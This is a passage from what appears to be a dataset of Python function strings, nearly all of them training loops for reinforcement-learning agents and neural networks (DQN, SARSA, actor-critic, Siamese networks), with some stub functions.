MCTS(self.game, self.nnet, self.args, mcts=True) # reset search tree\n print(self.tracker.print_diff())\n self.writeLogsToFile(epochswin, epochdraw, training=True)", "def train_one_epoch(self):\n raise NotImplementedError", "def train_on_history(self, history):\n \n # Split into episodes\n n_episodes = history[-1][\"episode\"] \n episodes = [list(filter(lambda h: h[\"episode\"]==e , history)\n ) for e in range(n_episodes)\n ]\n\n 
# Split into game lives\n for episode in episodes:\n \n \n game_lives = [\n list(filter(lambda h: h.get('info').get('ale.lives')==l, episode)\n ) for l in range(5)\n ]\n \n for life in game_lives:\n if life:\n self.train(life)\n else:\n print(\"No ocurrance\")\n return", "def train(self,env, iter_n=2000):\n\n\t\tfor i in range(iter_n):\n\t\t\tif i > 50:\n\t\t\t\tif all(reward > 195 for reward in self.step_count[-10:]):\n\t\t\t\t\tprint('solved at episode {}'.format(i))\n\t\t\t\t\tbreak\n\t\t\tstate = self.env.reset()\n\t\t\tstate = np.reshape(state, [1, self.state_size])\n\n\t\t\tepisode_complete = False\n\t\t\tstep = 0\n\t\t\twhile not episode_complete and (step < self.max_steps):\n\t\t\t\taction = self.define_action(state)\n\t\t\t\tnew_state, reward, episode_complete, info = env.step(action)\n\t\t\t\tnew_state = np.reshape(new_state, [1, self.state_size])\n\n\t\t\t\tself.memory.append((state, action, reward, new_state, episode_complete))\n\t\t\t\tself.round_reward += reward\n\t\t\t\tstate = new_state\n\t\t\t\tstep += 1\n\t\t\t\tif episode_complete:\n\t\t\t\t\tself.round_reward += -10\n\t\t\t\t\tself.update_target_model()\n\t\t\t\t\tself.print_results(i, iter_n, step)\n\t\t\t\t\tif i != 0: # Update totals in memory if not the first run\n\t\t\t\t\t\tself.update_totals(i, step)\n\t\t\t\tif len(self.memory) > self.training_iter:\n\t\t\t\t\tself.replay()\n\t\t\tif self.epsilon > self.epsilon_min:\n\t\t\t\tself.epsilon *= self.epsilon_decay\n\n\t\treturn self.all_iterations, self.all_rewards, self.step_count", "def train_one_eps(self, env, horizon=1000, lr=0.1):\n\t\tr_ep = 0 # variable to track episode \n\t\tep_len = 0\n\n\t\tstate = env.reset()\n\t\taction = self.select_action(state)\n\n\t\tfor t in range(horizon):\n\t\t\t\n\t\t\tstate2, r, done, _ = env.step(action)\n\t\t\tep_len = ep_len + 1\n\t\t\tr_ep += r\n\n\t\t\taction2 = self.select_action(state2)\n\t\t\tself.update(state, action, r, state2, action2, lr=lr)\n\t\t\taction = action2\n\t\t\t\n\t\t\tif(done):\n\t\t\t\tbreak\n\t\t\tstate = state2\n\n\t\treturn r_ep, ep_len", "def train_epoch(self):\n for batch, targets in self.training_dataloader:\n self.training_step(batch, targets)\n self.calculate_training_loss()\n self.epochs_trained += 1\n LOGGER.info(\n \"Training loss after {} epochs: {}\".format(str(self.epochs_trained), str(self.training_average_loss))\n )", "def fit(self):\n for i in range(self.current_epoch, self.max_epoch):\n self.current_epoch += 1\n # train\n train_dataloader = self.data_module.get_train_dataloader(\n batch_size=self.train_batch_size, \n shuffle=self.train_dataloader_shuffle, \n num_workers=self.dataloader_num_workers,\n pin_memory=True\n )\n neptune.log_metric(\"learning_rate_vs_epoch\", self.optimizer.param_groups[0]['lr'])\n self.train_one_epoch(train_dataloader)\n\n # validate \n if self.validate_after == 'epoch' and self.train_on_all_data == False and self.run_lr_range_test == False:\n validation_dataloader = self.data_module.get_valid_dataloader(\n batch_size=self.valid_batch_size, \n shuffle=self.train_dataloader_shuffle, \n num_workers=self.dataloader_num_workers, \n pin_memory=True\n )\n self.validate_one_epoch(validation_dataloader)\n\n if self.scheduler:\n if self.step_scheduler_after == 'epoch': \n if self.step_scheduler_metric == 'val_auc':\n self.scheduler.step(self.metrics['valid'][-1]['auc_score'])\n else:\n self.scheduler.step()\n\n if self.run_lr_range_test:\n neptune.log_metric('validation_epoch_end_AUC_vs_LR', \n self.scheduler.get_last_lr()[0], 
y=self.metrics['valid'][-1]['auc_score'])\n\n # checkpoint model for resuming model\n if (self.current_epoch % self.checkpoint_epochs) == 0:\n self.save_checkpoint()\n\n # sleep the training process\n if self.current_epoch % self.sleep_in_epochs == 0:\n print(f\"SLEEPING FOR {self.sleep_time} at epoch={self.current_epoch}\")\n for i in range(int(self.sleep_time/30)):\n time.sleep(i)\n neptune.log_metric(\"sleeping_status\", y=1)\n\n stop_training = self.stopping_criteria()\n if stop_training:\n if self.fp16:\n self.scaler.step(self.optimizer)\n self.scaler.update()\n self.optimizer.zero_grad()\n else:\n self.optimizer.step()\n self.optimizer.zero_grad()\n # backward all the accumulate gradients\n print(f\"stopped training at {self.current_epoch} epoch\")\n break", "def _sp_train(self, max_steps, instances, visualize, plot):\n # Keep track of rewards per episode per instance\n episode_reward_sequences = [[] for i in range(instances)]\n episode_step_sequences = [[] for i in range(instances)]\n episode_rewards = [0] * instances\n\n # Create and initialize environment instances\n envs = [self.create_env() for i in range(instances)]\n envs[0].render(mode='human')\n states = [env.reset()['observation'][0] for env in envs] # get the image\n\n for step in range(max_steps):\n for i in range(instances):\n if visualize: envs[i].render()\n action, angle_index, action_index = self.agent.act(states[i], i)\n\n next_state, reward, done, _ = envs[i].step(action)\n (next_image, next_depth) = next_state['observation']\n self.agent.push(\n Transition(states[i], [angle_index, action_index], reward, None if done else next_image), i)\n episode_rewards[i] += reward\n if done:\n episode_reward_sequences[i].append(episode_rewards[i])\n episode_step_sequences[i].append(step)\n episode_rewards[i] = 0\n if plot: plot(episode_reward_sequences, episode_step_sequences)\n (image, depth) = envs[i].reset()['observation']\n states[i] = image\n else:\n states[i] = next_image\n # Perform one step of the optimization\n self.agent.train(step)\n\n if plot: plot(episode_reward_sequences, episode_step_sequences, done=True)", "def train_models(self):\n\n #keep track on the number of iterations (needed to scale lambda)\n nr_iteration = 0\n \n for epoch in range(self.epochs):\n start = time.time()\n print()\n print(epoch + 1)\n print()\n for step, batch in enumerate(self.training_data):\n X_batch = normalize_images(tf.cast(batch[0], 'float32'))\n Y_batch = batch[1]\n Z_batch = self.ae_model.encode(X_batch)\n \n self.train_step_disc(Z_batch, Y_batch)\n # Call only one tf.function when tracing.\n #ADD LAMBDA SCHEDULE ACCORDING TO OUR EXPERIMENTS AND EPOCH LENGTH\n self.scale_lambda(self.lambda_e, nr_iteration)\n self.train_step_ae(X_batch, Y_batch, Z_batch)\n\n nr_iteration += 1\n end = time.time()\n print(\"Epoch \" + str(epoch + 1) + \" takes \" + str(end - start))", "def getTrainEpisodes(self):\n print(\"Do you want to train the IA?\")\n while True:\n num_episodes = raw_input(\"Type number iterations to train, [0] to not train: \")\n try:\n if int(num_episodes) >= 0:\n return int(num_episodes)\n print(\"Invalid input, try again\")\n except:\n print(\"Invalid input, try again\")\n return", "def train(self):\n tic = time.time()\n means = []\n stds = []\n steps = 0\n scores_window = deque(maxlen=100)\n for e in range(1,self.episodes):\n\n self.noise.step()\n episode_scores = []\n obs = self.env.reset()\n for t in range(self.tmax):\n actions = self.act(obs)\n next_obs,rewards,dones = self.env.step(actions)\n\n # Store experience\n if 
np.max(rewards) > 0:\n print('hit the ball over the net',rewards)\n self.R.add(obs.reshape(1,48),obs,actions,rewards,next_obs.reshape(1,48),next_obs,dones)\n obs = next_obs\n # Score tracking\n episode_scores.append(np.max(rewards))\n \n # Learn\n if len(self.R) > self.min_buffer_size:\n for _ in range(self.SGD_epoch):\n # Update each agent\n for i in range(self.num_agents):\n self.learn(i)\n # update target networks\n self.update_targets_all()\n \n steps += int(t)\n means.append(np.mean(episode_scores))\n stds.append(np.std(episode_scores))\n scores_window.append(np.sum(episode_scores))\n if e % 4 == 0:\n toc = time.time()\n r_mean = np.mean(scores_window)\n r_max = max(scores_window)\n r_min = min(scores_window)\n r_std = np.std(scores_window)\n plot(self.name,means,stds)\n print(\"\\rEpisode: {} out of {}, Steps {}, Rewards: mean {:.2f}, min {:.2f}, max {:.2f}, std {:.2f}, Elapsed {:.2f}\".format(e,self.episodes,steps,r_mean,r_min,r_max,r_std,(toc-tic)/60))\n if np.mean(scores_window) > self.winning_condition:\n print('Env solved!')\n # save scores\n pickle.dump([means,stds], open(str(self.name)+'_scores.p', 'wb'))\n # save policy\n self.save_weights(self.critic_path,self.actor_path)\n break", "def setup_training(self):\n print('setup training called')\n self.steps_done = 0\n self.current_episode_num = 1\n self.total_reward = 0\n\n # self.optimizer = optim.RMSprop(policy_net.parameters())\n self.memory = ReplayMemory(300000)\n self.total_reward_history = []\n # self.loss_history = []\n self.positions = []\n self.n_destroyed_crates = 0\n self.is_in_bomb_range = False", "def train_step(self):\n pass", "def train(self, x, t):\n for i in range(self.number_model):\n curr_model = self.all_model[i]\n curr_model.fit(x, t)", "def train(self):\n total_steps = 0\n scores_history = [deque(maxlen=self.run_settings.averaging_window)\n for a in range(len(self.agents))]\n averages_history = [[] for a in range(len(self.agents))]\n\n for e in range(self.run_settings.num_episodes):\n # Initialize episode\n try:\n env_states, rewards, done, metainfo = self.custom_env.reset()\n except EpisodeCrashException:\n for a in range(len(self.agents)):\n if hasattr(self.agents[a], 'notify_episode_crashed'):\n self.agents[a].notify_episode_crashed(self.run_settings)\n continue\n\n # Initialize scores to starting reward (probably 0)\n scores = rewards\n step = 0\n\n while not done:\n states = [self.agents[a].state_space_converter(env_states[a])\n for a in range(len(self.agents))]\n\n # Train agents\n if total_steps > 0 and total_steps % self.run_settings.train_every == 0:\n for agent in self.agents:\n agent.train(self.run_settings)\n\n # Save agent model\n if total_steps > 0 and total_steps % self.run_settings.save_every == 0:\n for agent in self.agents:\n agent.save()\n\n # Get actions\n actions = [self.agents[a].sample(states[a])\n for a in range(len(self.agents))]\n env_actions = [self.agents[a].action_space_converter(actions[a])\n for a in range(len(self.agents))]\n # Take environment step\n try:\n env_states, rewards, done, metainfo = self.custom_env.step(env_actions)\n except EpisodeCrashException:\n for a in range(len(self.agents)):\n if hasattr(self.agents[a], 'notify_episode_crashed'):\n self.agents[a].notify_episode_crashed(self.run_settings)\n break\n step += 1\n total_steps += 1\n\n # Update scores\n scores = [scores[a] + rewards[a] for a in range(len(self.agents))]\n # Push to agent Memories\n for a in range(len(self.agents)):\n self.agents[a].push_memory(states[a], actions[a], rewards[a], done)\n\n if 
done:\n averages = []\n for a in range(len(scores_history)):\n scores_history[a].append(scores[a])\n averages.append(np.mean(scores_history[a]))\n averages_history[a].append(averages[a])\n\n if len(scores) == 1:\n scores = scores[0]\n averages = averages[0]\n if self.run_settings.verbose:\n print(\"Game {} ended after {} steps. Game score: {}. Averages: {}\"\n .format(e+1, step, scores, averages))\n if (self.run_settings.graph_every > 0 and e > 0\n and e % self.run_settings.graph_every == 0):\n self.plot_results(averages_history)", "def training(self) -> None:\n self.compile_model()\n self.train_epoch()\n self.agent.save()", "def train_dqn(self, n_episodes=2000, max_t=1000, eps_start=1.0, eps_end=0.01, eps_decay=0.995):\n self.scores = [] # list containing scores from each episode\n scores_window = deque(maxlen=100) # last 100 scores\n eps = eps_start # initialize epsilon\n for i_episode in range(1, n_episodes+1):\n env_info = self.env.reset(train_mode=True)[self.brain_name] # reset the environment\n state = env_info.vector_observations[0] # get the current state\n score = 0 # initialize the score\n for t in range(max_t):\n action = self.agent.act(state, eps)\n env_info = self.env.step(action)[self.brain_name] # send the action to the environment\n next_state = env_info.vector_observations[0] # get the next state\n reward = env_info.rewards[0] # get the reward\n done = env_info.local_done[0] # see if episode has finished\n self.agent.step(state, action, reward, next_state, done)\n state = next_state\n score += reward\n if done:\n break \n scores_window.append(score) # save most recent score\n self.scores.append(score) # save most recent score\n eps = max(eps_end, eps_decay*eps) # decrease epsilon\n print('\\rEpisode {}\\tAverage Score: {:.2f}'.format(i_episode, np.mean(scores_window)), end=\"\")\n if i_episode % 100 == 0:\n print('\\rEpisode {}\\tAverage Score: {:.2f}'.format(i_episode, np.mean(scores_window)))\n # we use 15.0 just to be sure\n if np.mean(scores_window)>=self.threshold:\n print('\\nEnvironment solved in {:d} episodes!\\tAverage Score: {:.2f}'.format(i_episode-100, np.mean(scores_window)))\n break\n return self.scores", "def train_agent(\n self,\n *,\n env,\n test_env,\n save_name,\n train_every=1,\n max_episodes=1000,\n center_returns=True,\n render=True,\n ):\n\n agent = self.create_agent(env)\n\n for episode in range(1, max_episodes + 1):\n obs = env.reset()\n done = False\n\n episode_return = 0.0\n while not done:\n action = agent.act(obs, deterministic=False)\n next_obs, reward, done, _ = env.step(action)\n episode_return += reward\n agent.store_step(obs, action, reward, next_obs, done)\n obs = next_obs\n\n if render:\n env.render()\n\n if episode % train_every == 0:\n agent.perform_training(\n gamma=self.gamma, center_returns=center_returns\n )\n torch.save(agent, f\"saved_agents/{save_name}\")\n\n print(\"Episode {} -- return={}\".format(episode, episode_return))\n return agent", "def train(\n env: DiscreteEnvironment[TState, TAction],\n agent: DiscreteAgent[TState, TAction],\n n_episodes: int,\n on_action: Callable[[TState, TAction, float, int], None] = None,\n on_episode_end: Callable[[int], None] = None,\n) -> None:\n for ep in range(n_episodes):\n t = 0\n while not env.terminated:\n s, a, r = agent.act_and_train(t) # returns (S_t, A_t, R_t)\n if on_action:\n on_action(s, a, r, t)\n t += 1\n agent.episode_end()\n if on_episode_end:\n on_episode_end(t)\n env.reset()", "def train(cls,\n training,\n pdf_model,\n t_x,\n t_y):\n batch_size, num_epochs, num_episodes, 
samples, max_noise, min_noise = training()\n\n h_l = None\n h_vl = None\n\n idx = np.arange(cls.test_set_size)\n np.random.shuffle(idx)\n idx = idx[:samples]\n\n s_x = t_x[idx]\n s_y = t_y[idx]\n for i in range(0, num_episodes):\n print('>>>>>')\n print('EPISODE: ' + str(i))\n if max_noise > 0:\n sp = np.shape(s_y)\n s_y_r = np.random.rand(sp[0], sp[1])\n s_y_n = s_y * s_y_r * cls.noise_factor(epoch=i,\n max_epoch=num_episodes,\n max_noise=max_noise,\n min_noise=min_noise)\n s_y_n = s_y + ((s_y / 2.0) - s_y_n)\n\n history = pdf_model.fit(s_x,\n s_y_n,\n epochs=num_epochs,\n batch_size=batch_size,\n shuffle=True,\n validation_split=0.15,\n verbose=2\n )\n hl = history.history['loss']\n hv = history.history['val_loss']\n if h_l is None:\n h_l = hl\n h_vl = hv\n else:\n h_l = h_l + hl\n h_vl = h_vl + hv\n\n _p = np.zeros((1, cls.action_size))\n _p[0] = s_x[0]\n pr = model.predict(_p)\n cls.kld(s_y[0], pr)\n print('<<<<<')\n\n cls.plot_results(h_l, h_vl, (num_epochs * (i + 1)))\n cls.save_hist(history)\n return", "def fit(self, num_iterations, max_episode_length=250, eval_every_nth=1000, save_model_every_nth=1000, log_loss_every_nth=1000, video_every_nth=20000):\n self.compile()\n self.policy = LinearDecayGreedyEpsilonPolicy(start_value=1., end_value=0.1, num_steps=1e6, num_actions=self.num_actions) # for training\n self.replay_memory = ReplayMemory(max_size=1000000)\n self.log_loss_every_nth = log_loss_every_nth\n random_policy = UniformRandomPolicy(num_actions=self.num_actions) # for burn in \n num_episodes = 0\n\n # tf logging\n self.tf_session = K.get_session()\n self.tf_summary_writer = tf.summary.FileWriter(self.log_dir, self.tf_session.graph)\n\n while self.iter_ctr < num_iterations:\n state = self.env.reset()\n self.preprocessor.reset_history_memory()\n\n num_timesteps_in_curr_episode = 0\n total_reward_curr_episode = 0 \n\n while num_timesteps_in_curr_episode < max_episode_length:\n self.iter_ctr+=1 # number of steps overall\n num_timesteps_in_curr_episode += 1 # number of steps in the current episode\n\n # logging\n # if not self.iter_ctr % 1000:\n # print \"iter_ctr {}, num_episodes : {} num_timesteps_in_curr_episode {}\".format(self.iter_ctr, num_episodes, num_timesteps_in_curr_episode)\n\n # this appends to uint8 history and also returns stuff ready to be spit into the network\n state_network = self.preprocessor.process_state_for_network(state) #shape is (4,84,84,1). 
axis are swapped in cal_q_vals\n # print \"shape {}, max {}, min {}, type {} \".format(state_network.shape, np.max(state_network), np.min(state_network), state_network.dtype)\n\n # burning in \n if self.iter_ctr < self.num_burn_in:\n action = random_policy.select_action() # goes from 0 to n-1\n next_state, reward, is_terminal, _ = self.env.step(action)\n reward_proc = self.preprocessor.process_reward(reward)\n total_reward_curr_episode += reward_proc\n state_proc_memory = self.preprocessor.process_state_for_memory(state)\n # atari_preprocessor.process_state_for_memory converts it to grayscale, resizes it to (84, 84) and converts to uint8\n self.replay_memory.append(state_proc_memory, action, reward_proc, is_terminal)\n\n if is_terminal or (num_timesteps_in_curr_episode > max_episode_length-1):\n state = self.env.reset()\n num_episodes += 1\n with tf.name_scope('summaries'):\n self.tf_log_scaler(tag='train_reward_per_episode_wrt_no_of_episodes', value=total_reward_curr_episode, step=num_episodes)\n self.tf_log_scaler(tag='train_reward_per_episode_wrt_iterations', value=total_reward_curr_episode, step=self.iter_ctr)\n print \"iter_ctr {}, num_episodes : {}, episode_reward : {}, loss : {}, episode_timesteps : {}, epsilon : {}\".format\\\n (self.iter_ctr, num_episodes, total_reward_curr_episode, self.loss_last, num_timesteps_in_curr_episode, self.policy.epsilon)\n num_timesteps_in_curr_episode = 0\n self.dump_train_episode_reward(total_reward_curr_episode)\n # this should be called when num_timesteps_in_curr_episode > max_episode_length, but we can call it in is_terminal as well. \n # it won't change anything as it just sets the last entry's is_terminal to True\n self.replay_memory.end_episode() \n break\n\n # training\n else:\n # print \"iter_ctr {}, num_episodes : {} num_timesteps_in_curr_episode {}\".format(self.iter_ctr, num_episodes, num_timesteps_in_curr_episode)\n q_values = self.calc_q_values(state_network)\n # print \"q_values {} q_values.shape {}\".format(q_values, q_values.shape)\n #print \"q_values.shape \", q_values.shape\n action = self.policy.select_action(q_values=q_values, is_training=True)\n next_state, reward, is_terminal, _ = self.env.step(action)\n reward_proc = self.preprocessor.process_reward(reward)\n total_reward_curr_episode += reward_proc\n state_proc_memory = self.preprocessor.process_state_for_memory(state)\n self.replay_memory.append(state_proc_memory, action, reward_proc, is_terminal)\n\n # validation. 
keep this clause before the breaks!\n if not(self.iter_ctr%eval_every_nth):\n print \"\\n\\nEvaluating at iter {}\".format(self.iter_ctr)\n if not(self.iter_ctr%video_every_nth):\n self.evaluate(num_episodes=20, max_episode_length=max_episode_length, gen_video=True)\n else:\n self.evaluate(num_episodes=20, max_episode_length=max_episode_length, gen_video=False)\n print \"Done Evaluating\\n\\n\"\n\n # save model\n if not(self.iter_ctr%save_model_every_nth):\n self.q_network.save(os.path.join(self.log_dir, 'weights/q_network_{}.h5'.format(str(self.iter_ctr).zfill(7))))\n\n if is_terminal or (num_timesteps_in_curr_episode > max_episode_length-1):\n state = self.env.reset()\n num_episodes += 1\n with tf.name_scope('summaries'):\n self.tf_log_scaler(tag='train_reward_per_episode_wrt_no_of_episodes', value=total_reward_curr_episode, step=num_episodes)\n self.tf_log_scaler(tag='train_reward_per_episode_wrt_iterations', value=total_reward_curr_episode, step=self.iter_ctr)\n print \"iter_ctr {}, num_episodes : {}, episode_reward : {}, loss : {}, episode_timesteps : {}, epsilon : {}\".format\\\n (self.iter_ctr, num_episodes, total_reward_curr_episode, self.loss_last, num_timesteps_in_curr_episode, self.policy.epsilon)\n num_timesteps_in_curr_episode = 0\n self.dump_train_episode_reward(total_reward_curr_episode)\n self.replay_memory.end_episode() \n break\n\n if not(self.iter_ctr % self.train_freq):\n self.update_policy()\n\n state = next_state", "def agents_train(self, game_step, episode_now, args):\n # update all trainers, if not in display or benchmark mode\n if episode_now < args.learning_start_episode: return \n if self.update_cnt > 0 and self.var >= self.min_var: self.var *= args.var_discount\n #if episode_now > self.last_update_episode and (episode_now - args.learning_start_episode) % args.learning_fre == 0:\n if game_step % args.learning_fre_step == 0:\n if self.update_cnt == 0: print('\\r=start training ...'+' '*100)\n self.last_update_episode = episode_now\n self.update_cnt += 1\n\n # update every agent in different memory batch\n for agent_idx, (actor_c, actor_t, critic_c, critic_t, opt_a, opt_c) in \\\n enumerate(zip(self.actors_cur, self.actors_tar, self.critics_cur, \\\n self.critics_tar, self.optimizers_a, self.optimizers_c)):\n # del if opt_c == None: continue # jump to the next model update\n\n # sample the experience\n _obs_n_o, _action_n, _rew_n, _obs_n_n, _done_n = self.memory.sample( \\\n args.batch_size, agent_idx) # Note_The func is not the same as others\n \n # --use the date to update the CRITIC\n rew = torch.tensor(_rew_n, device=args.device, dtype=torch.float) # set the rew to gpu\n done_n = torch.tensor(~_done_n, dtype=torch.float, device=args.device) # set the rew to gpu\n action_cur_o = torch.from_numpy(_action_n).to(args.device, torch.float)\n obs_n_o = torch.from_numpy(_obs_n_o).to(args.device, torch.float)\n obs_n_n = torch.from_numpy(_obs_n_n).to(args.device, torch.float)\n\n action_tar = torch.cat([a_t(obs_n_n[:, self.obs_size[idx][0]:self.obs_size[idx][1]]).detach() \\\n for idx, a_t in enumerate(self.actors_tar)], dim=1)\n q = critic_c(obs_n_o, action_cur_o).reshape(-1) # q \n q_ = critic_t(obs_n_n, action_tar).reshape(-1) # q_ \n q_ = q_*args.gamma*done_n + rew*torch.tensor(args.reward_scale_par, device=args.device) # q_*gamma*done + reward\n loss_c = torch.nn.MSELoss()(q, q_.detach()) # bellman equation\n opt_c.zero_grad()\n loss_c.backward()\n nn.utils.clip_grad_norm_(critic_c.parameters(), args.max_grad_norm)\n opt_c.step()\n\n # --use the data to update the 
ACTOR\n # There is no need to cal other agent's action\n opt_c.zero_grad()\n model_out, policy_c_new = actor_c( \\\n obs_n_o[:, self.obs_size[agent_idx][0]:self.obs_size[agent_idx][1]], model_original_out=True)\n # update the aciton of this agent\n action_cur_o[:, self.action_size[agent_idx][0]:self.action_size[agent_idx][1]] = policy_c_new \n loss_pse = torch.mean(torch.pow(model_out, 2))\n loss_a = torch.mul(torch.tensor(-1.0, device=args.device), torch.mean(critic_c(obs_n_o, action_cur_o)))\n\n opt_a.zero_grad()\n (2e-3*loss_pse+loss_a).backward()\n #loss_a.backward()\n nn.utils.clip_grad_norm_(actor_c.parameters(), args.max_grad_norm)\n opt_a.step()\n\n # save the model to the path_dir ---cnt by update number\n #if self.update_cnt > args.start_save_model and self.update_cnt % args.fre4save_model == 0:\n if self.update_cnt > args.start_save_model and self.update_cnt % args.fre4save_model_step == 0:\n time_now = time.strftime('%y%m_%d%H%M')\n print('=time:{} step:{} save'.format(time_now, game_step))\n model_file_dir = os.path.join(args.save_dir, '{}_{}_{}'.format( \\\n args.scenario_name, time_now, game_step))\n if not os.path.exists(model_file_dir): # make the path\n os.mkdir(model_file_dir)\n for agent_idx, (a_c, a_t, c_c, c_t) in \\\n enumerate(zip(self.actors_cur, self.actors_tar, self.critics_cur, self.critics_tar)):\n torch.save(a_c, os.path.join(model_file_dir, 'a_c_{}.pt'.format(agent_idx)))\n torch.save(a_t, os.path.join(model_file_dir, 'a_t_{}.pt'.format(agent_idx)))\n torch.save(c_c, os.path.join(model_file_dir, 'c_c_{}.pt'.format(agent_idx)))\n torch.save(c_t, os.path.join(model_file_dir, 'c_t_{}.pt'.format(agent_idx)))\n\n # update the tar par\n self.actors_tar = self.update_trainers(self.actors_cur, self.actors_tar, args.tao) \n self.critics_tar = self.update_trainers(self.critics_cur, self.critics_tar, args.tao)", "def trainNet():", "def train(self):\n if len(self.experience) < self.minibatch_size:\n return\n\n # sample a minibatch_size of random episode with a number of transitions >= unrollings_num\n random_episodes_indecies = np.random.choice(len(self.experience), self.minibatch_size)\n random_episodes = []\n for index in random_episodes_indecies:\n episode = self.experience[index]\n\n # 0:random_transitions_space is the range from which a random transition\n # can be picked up while having unrollings_num - 1 transitions after it\n random_transitions_space = len(episode) - self.unrollings_num\n random_start = np.random.choice(random_transitions_space, 1)\n\n random_episodes.append(episode[random_start:random_start + self.unrollings_num])\n\n state_shape = tuple([self.minibatch_size, self.unrollings_num] + self.state_shape)\n\n # prepare the training data\n states = np.empty(state_shape, dtype=np.float32)\n next_states = np.empty(state_shape, dtype=np.float32)\n rewards = np.empty((self.minibatch_size, self.unrollings_num, ), dtype=np.float32)\n transition_action_filters = np.zeros((self.minibatch_size, self.unrollings_num, self.actions_count), dtype=np.float32)\n next_legal_actions_filters = np.zeros((self.minibatch_size, self.unrollings_num, self.actions_count), dtype=np.float32)\n\n for i, episode in enumerate(random_episodes):\n for j, transition in enumerate(episode):\n state, action, reward, nextstate, next_legal_actions = transition\n\n states[i,j], rewards[i,j], next_states[i,j] = state, reward, nextstate\n transition_action_filters[i,j][action] = 1.0\n next_legal_actions_filters[i,j][next_legal_actions] = 1.0\n\n self.prediction_nn.clearLSTMS(self.session)\n 
self.target_nn.clearLSTMS(self.session)\n\n loss,_ = self.session.run([self.loss, self.finalize], {\n self.states: states,\n self.next_states: next_states,\n self.rewards: np.reshape(rewards, (self.minibatch_size * self.unrollings_num, )),\n self.transition_action_filters: np.reshape(transition_action_filters, (self.minibatch_size * self.unrollings_num, self.actions_count)),\n self.next_legal_actions_filters: np.reshape(next_legal_actions_filters, (self.minibatch_size * self.unrollings_num, self.actions_count))\n })\n\n if self.iteration != 0 and self.iteration % self.freeze_period == 0:\n self.target_nn.assign_to(self.prediction_nn, self.session)\n\n self.iteration += 1\n\n return loss, self.iteration", "def train_SN(model, optimizer, scheduler, episodes=1):\n model = model.to(device=device) # move the model parameters to CPU/GPU\n for episode in range(episodes):\n scheduler.step(episode)\n model.train() # set to train mode\n\n # make the samplers \n # make 2 samplers, one for the \"sample/training set\" of a one-shot classifier\n # other sampler is for the \"query/test set\" which provides many comparisons\n train_sample_sampler = SampleSampler(num_cl=NUM_CL)\n sampled_classes = train_sample_sampler.cl_list\n sampled_examples = train_sample_sampler.ex_list\n train_query_sampler = QuerySampler(sampled_classes, sampled_examples, num_inst=NUM_EX)\n\n # make the dataloaders\n s_batch_num = 1 # one shot \"training\" each\n q_batch_num = NUM_EX # pair up number of examples per class in a batch (default 19)\n train_sample_loader = DataLoader(omni_train, batch_size=s_batch_num, sampler=train_sample_sampler)\n train_query_loader = DataLoader(omni_train, batch_size=q_batch_num, sampler=train_query_sampler)\n \n # start training\n scores = torch.zeros(NUM_CL,(NUM_EX+NUM_CL-1)).to(device=device, dtype=dtype)\n targets = torch.zeros(NUM_CL,(NUM_EX+NUM_CL-1)).to(device=device, dtype=dtype)\n sample_count = 0\n for i, (sample, sample_label) in enumerate(train_sample_loader):\n sample_count += 1\n idx = 0\n for j, (batch, batch_labels) in enumerate(train_query_loader):\n if sample_label != batch_labels[0]:\n k = np.random.randint(NUM_EX)\n query = batch[k,:,:,:].to(device=device, dtype=dtype)\n query = query.view(1,1,IMG_SIZE,IMG_SIZE)\n sample = sample.to(device=device, dtype=dtype)\n targets[i,idx] = make_target(sample_label, batch_labels[0])\n scores[i,idx] = model(sample,query)\n idx += 1\n \n elif sample_label == batch_labels[0]:\n for k in range(NUM_EX):\n query = batch[k,:,:,:].to(device=device, dtype=dtype)\n query = query.view(1,1,IMG_SIZE,IMG_SIZE)\n sample = sample.to(device=device, dtype=dtype)\n targets[i,idx] = make_target(sample_label, batch_labels[0])\n scores[i,idx] = model(sample,query)\n idx += 1\n \n targets = targets.view(-1)\n scores = scores.view(-1)\n \n # train and update model\n optimizer.zero_grad()\n #loss = F.binary_cross_entropy(scores, targets)\n loss = F.mse_loss(scores, targets)\n loss.backward()\n #nn.utils.clip_grad_norm_(model.parameters(),0.5)\n optimizer.step()\n\n # episodic updates\n if (episode+1)%100 == 0:\n print(\"episode:\",episode+1,\"loss\",loss.data)\n\n if (episode+1)%1000 == 0:\n ''' Test the model '''\n # make the samplers \n test_sample_sampler = SampleSampler(total_cl=659)\n sampled_classes = test_sample_sampler.cl_list\n sampled_examples = test_sample_sampler.ex_list\n test_query_sampler = QuerySampler(sampled_classes, sampled_examples, num_inst=1)\n\n # make the dataloaders\n s_batch_num = 1 # one shot each\n q_batch_num = 1 # one test each\n 
test_sample_loader = DataLoader(omni_test, batch_size=s_batch_num, sampler=test_sample_sampler)\n test_query_loader = DataLoader(omni_test, batch_size=q_batch_num, sampler=test_query_sampler)\n check_accuracy(test_sample_loader, test_query_loader, model)\n\n if (episode+1)%100000 == 0:\n \"\"\" Save as a draft model \"\"\"\n torch.save(model.state_dict(), PATH)", "def train():\n # YOUR TRAINING CODE GOES HERE", "def start_training(self):\n i = 0\n for _ in range(self.train_steps):\n print(f\"Start Training Step {i + 1}\")\n self.model.learn(total_timesteps=self.total_time_steps)\n self.model.save(self.save_path)\n print(f\"Finished Training Step {i + 1}\")\n i += 1", "def _train_epoch(self, model, tqdm_data,\n optimizer_disc=None, optimizer_gen=None):", "def train_epoch(self):\r\n for loader in self.loaders:\r\n if self.epoch % loader.epoch_interval == 0:\r\n self.cycle_dataset(loader)\r\n\r\n self._stats_new_epoch()\r\n self._write_tensorboard()\r\n print('{}th epoch train / eval done!'.format(self.epoch))", "def train_multiple_eps(self, env, no_episodes=200, horizon=1000, lr=0.1):\n\n\t\tr_vec = []\n\t\tep_len_vec = []\n\t\tfor i in range(no_episodes):\n\n\t\t\t# Run the agent for one episode and get a vector of rewards and a scalar for episode length\n\t\t\tr_ep, ep_len = self.train_one_eps(env, horizon=horizon, lr=lr)\n\n\t\t\t# Storing the information\n\t\t\tr_vec.append(r_ep)\n\t\t\tep_len_vec.append(ep_len)\n\n\t\treturn r_vec, ep_len_vec", "def train(self):\r\n\r\n for cur_epoch in range(self.model.cur_epoch_tensor.eval(self.sess), self.config.num_epochs + 1, 1):\r\n self.train_epoch(cur_epoch)\r\n self.model.global_step_assign_op.eval(session=self.sess, feed_dict={\r\n self.model.global_step_input: self.model.global_step_tensor.eval(self.sess) + 1})", "def train():\n pass", "def train_step(self):\n step_actions = self.get_step_actions()\n *_, dones, _ = tf.numpy_function(\n self.step_envs, [step_actions, True, True], self.batch_dtypes\n )\n for done_idx in tf.where(dones):\n gradient_steps = self.gradient_steps or self.episode_steps[done_idx[0]]\n self.update_weights(gradient_steps)\n self.episode_steps.assign(\n (self.episode_steps + 